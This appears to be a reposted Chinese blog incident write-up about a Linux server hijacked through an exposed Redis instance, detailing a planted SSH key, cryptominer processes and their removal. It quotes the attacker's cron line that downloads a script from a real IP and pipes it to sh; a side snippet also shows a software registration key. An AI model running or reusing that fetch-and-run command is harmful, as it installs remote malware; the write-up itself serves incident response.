记一次服务器被攻击事件

最新推荐文章于 2022-02-13 15:43:29 发布
最新推荐文章于 2022-02-13 15:43:29 发布
阅读量100 收藏
点赞数
文章标签: 数据库 运维
原文链接:https://my.oschina.net/wangyli/blog/3057292
版权

病毒清除

事情都解决了好多天,今天来总结一下,那天开发问数据备份没有没有拉到他们的那台服务器上,于是乎就去看了一下为什么定时任务没有执行,看了之后,waht???我的定时任务全部没了,NND

定时任务就只有一个:
*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh

what?下意识的去看了一下cron log,发现出事情了,因为从log来看,(wget) ERROR (getpwnam() failed)是直接写进/var/spool/cron/root文件的

根据时间去history去翻命令log (histroy加上时间参数还是有作用的), 发现没有命令往cron写命令,猜测并不是我们的运维去操作的,再看这个log,发现特么这个ip是美国的,

检查/root/ssh/下,发现了一个Key,时间正好也和cron上log时间相对于,立马想到,服务器给攻击了,,,,

查看脚本内容发现如下:

 感情是把我的服务器给当矿机了...MMP,删除cron的内容,查找ddgs的进程,把它给kill掉,删除/tmp下的ddgs.3013文件,查看top发现还有一个进程也特么使用率非常高,qW3xT.2 ,同样的,也给删除掉,删除掉/root/下的key,再次检查一下,发现已经给清掉了,此时,应该查找问题源头,然后备份重要文件,对服务器进行重新安装系统,因为,不重装没办法保证彻底清理干净,so,应急方案得有,一模一样得服务器一台,有问题,立马切换接管,平时不用都行,甚至虚拟机都成,作为临时接管对象。

查找问题源

同样分析为什么会出现这种情况,能够清除cron,还能够往ssh key里面写内容,唯一能够想到的,便是redis了,redis是用root登录的,是有权利写入ssh key的,,密码即为简单,且防火墙允许公网上所有IP连接,于是乎,进入redis,想去看看有没有什么蛛丝马迹,遗憾发现没有什么有用的信息,so,防火墙开放redis的端口对特有的IP开放,其实不仅仅是Redis,各种开放的端口,尽量最小化。

 

转载于:https://my.oschina.net/wangyli/blog/3057292

chiyaju0577
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次linux服务器入侵应急响应(小结)
01-10
近日接到客户求助,他们收到托管电信机房的信息,通知检测到他们的一台服务器有对外发送攻击流量的行为。希望我们能协助排查问题。 一、确认安全事件 情况紧急,首先要确认安全事件的真实性。经过和服务器运维人员...
一次tp5.0.241
08-03
TP5.0.24 版本中存在 Remote Code Execution(RCE)漏洞,该漏洞可以被攻击者利用来执行恶意代码,从而控制服务器。下面我们将对该漏洞进行详细的分析和利用。 漏洞分析 TP5.0.24 版本中的 RCE 漏洞是由于框架中的...
服务器攻击纪实
上古豆腐的博客
09-08 118
服务器被黑纪实 Day1 首先是由于服务器上的几个账号的密码总是被莫名的改掉,比如27号,software账号的密码就被更改了。由于ubuntu的安全机制,我无法看到改后的密码。 为了排查这个问题,我查看了系统的登录日志,于是乎发现了大量的ssh登录失败的日志: 从上图的登录请求来看,攻击者肯定不是使用暴力破解方式,而是拥有一个字典库或者也叫密码库,来进行撞库攻击。因此,我才决定更改ssh登录地址。 从上图还可以发现一个问题,即请求者的IP都是127.0.0.1,这个并不是因为攻击者太牛逼,把自己的IP
【实战录】服务器遭到攻击全过程(Redis漏洞)
qq_41997592的博客
02-13 3423
第一次面对服务器攻击全过程,由被动到主动!!
Linux mysql crontab定时备份--报错;crond[2382]: (wget) ERROR (getpwnam() failed)
wsyzxss的博客
10-29 3655
crontab 日志 tail -f /var/log/cron 打印日志 Oct 29 13:39:01 iuserZ crond[2382]: (wget) ERROR (getpwnam() failed) Oct 29 13:39:01 iuserZ CROND[9041]: (root) CMD (/mysqldata/bktestmysql.sh) , 单独执行该脚本可以...
FlashFXP 5.4.0 注册
热门推荐
wsyzxss的博客
05-10 3万+
打开软件 点击--帮助--关于-- 点击--右边中部的 钥匙 输入以下全部字母数字    FLASHFXPwQAOlhkgwQAAAAC6W5MNJwTnsl73nIraAU149tnCQS    0hmZU3GGBQG1FtoSp5x0mUgA7bFW0qr0fKk2KCA+v2CCrFbF+q    bmLvEjV+4JCAX+H/TBpG7pdEJ8IEW09ST8t60Poou/...
一次利用mssql上线1
最新发布
08-03
本文录了一次通过Microsoft SQL Server(简称MSSQL)进行上线操作的安全测试过程。在渗透测试中,当主要网站未发现明显漏洞时,转向子站点进行深度挖掘。在子站上,检测到了一个MSSQL注入漏洞,这是由于SQL查询...
如何设置一定时间内只能发送一次请求
09-04
在IT行业中,尤其是在Web开发领域,限制用户在一定时间内只能发送一次请求是非常常见的需求,这通常用于防止重复提交、刷票、恶意攻击等场景。以下将详细解释如何实现这一功能,以及涉及的相关知识点。 首先,我们...
拒绝服务器攻击检测器
11-29
"拒绝服务器攻击检测器"是一种专门针对此类威胁的防御工具。 拒绝服务攻击的基本原理是利用网络中的大量计算机或设备,以超负荷的流量冲击目标服务器。这种攻击可能源于单一攻击者控制的“僵尸网络”,也可能由恶意...
nginx: [emerg] getpwnam(“www”) failed错误
yuntian_zhongyi的专栏
09-14 4836
linux 64系统中安装nginx时如果出现错误:nginx: [emerg] getpwnam(“www”) failed in ........ 解决方法
连接Linux服务器svn时报错,无法验证,验证位置时发生错误。
wsyzxss的博客
05-17 1327
  org.apache.subversion.javahl.ClientException: Can't create session svn: Commit failed (details follow): svn: Unable to connect to a repository at URL 'svn://145.73.232.122/Demofol_test/Befriend_CS/...
getpwnam() -- 获取用户属性
strokeyang
04-03 3295
#include #include int main(){    struct passwd * pw;    char *username = "zxl";    pw = getpwnam(username);    if (!pw) {        printf("%s is not exist/n", username);        return -1;    }    printf
网站接口被恶意攻击怎么办
resilient的博客
09-27 3492
无论网站,还是App目前基本都是基于api接口模式的开发,那么api的安全就尤为重要了。目前攻击最常见的就是“短信轰炸机”,由于短信接口验证是App,网站检验用户手机号最真实的途径,使用短信验证码在提供便利的同时,也成了呗恶意攻击的对象,那么如何才能防止被恶意调用呢? 1.图形验证码: 将图形校验码和手机验证码进行绑定,在用户输入手机号码以后,需要输入图形校验码成功后才可以触发短信验证,这样能...
一次Linux服务器被入侵和删除木马程序的经历
烂笔头的博客
02-06 1万+
本文出自 “小小水滴” 博客,请务必保留此出处http://wangzan18.blog.51cto.com/8021085/1740113 一、背景     晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包。     我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面
rabbitmq常用的3种模式
peanut的博客
07-11 7156
1.fanout(广播,发布订阅) 发送到exchange的所有消息会被转发到与exchange绑定的所有queue,不需要处理路由 路由的作用:exchange会根据路由匹配队列,发送一个消息到交换机的时候,交换机根据路由发送到匹配这个路由的队列中去 1.public Binding FanoutBinding1() { return BindingBuilder.bin...
一次服务器被挖矿木马攻击的经历
Lisong_jack的博客
06-11 588
基本情况介绍: 使用TOP命令,查看所有进程占用资源情况,发现存在一个进程,占用大量CPU资源和内存资源。进入/proc/<PID>目录下,看到该进程的命令来源于/tmp下。使用kill -9 <PID> 命令杀死该进程之后,一会又有新的进程产生,依然占用大量CPU。 于是猜想可能存在定时任务或者其守护进程。使用systemctl status ...
录一次阿里云服务器攻击事件
大后生大大大的博客
11-20 3186
收到阿里云的攻击提示消息 直接导致的问题 服务器不能访问外网 分析 1.服务器安全组严格控制好对外的端口,可以的话就只打开nginx的80和443 2.做好服务集群部署,便于出现问题的时候及时切换 ...
万恶的crontab定时任务--被攻击了--20201102更新 挖坑病毒
今朝歌莫言醉
10-19 3192
现象 服务器cpu占用极高,经常卡顿,干掉进程,不一会儿又出现了,那么有可能被注入了定时运行规则了; 处理过程 1、使用top监控资源情况,发现异常,使用kill干掉了 2、但过段时间又冒出来了,这是使用crontab -l 发现异常定时规则 3、查询定时任务日志 /var/log/cron,发现异常进程从某行代码开始 4、分析/etc/cron.d/pwnrig 脚本【这个是从日志中发现的异常文件】如下 5、跟踪启动文件/bin/crondr,发现还不能删除,被锁定了 ..

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值